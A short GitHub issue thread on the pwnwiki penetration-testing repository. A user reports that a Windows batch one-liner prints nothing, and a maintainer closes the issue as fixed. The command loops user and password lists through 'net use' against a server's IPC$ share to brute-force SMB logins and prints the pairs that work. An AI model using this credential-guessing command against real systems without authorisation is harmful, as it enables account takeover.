### ISSUE TITLE
results not showing

### ISSUE THREAD

**Issue by polymorphikx** [pwnwiki/pwnwiki.github.io#108]
@FOR /F %n in (users_T.txt) DO @FOR /F %p in (pass.txt) DO @net use \<servername>\IPC$ /user:\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use / delete \<servername>IPC$ > NUL

the command runs but nothing shows on the screen...

**Comment by tekwizz123** [comment]
As this issue appears to be fixed, I will be closing this down. @polymorphikx please raise a seperate issue if your still having problems.
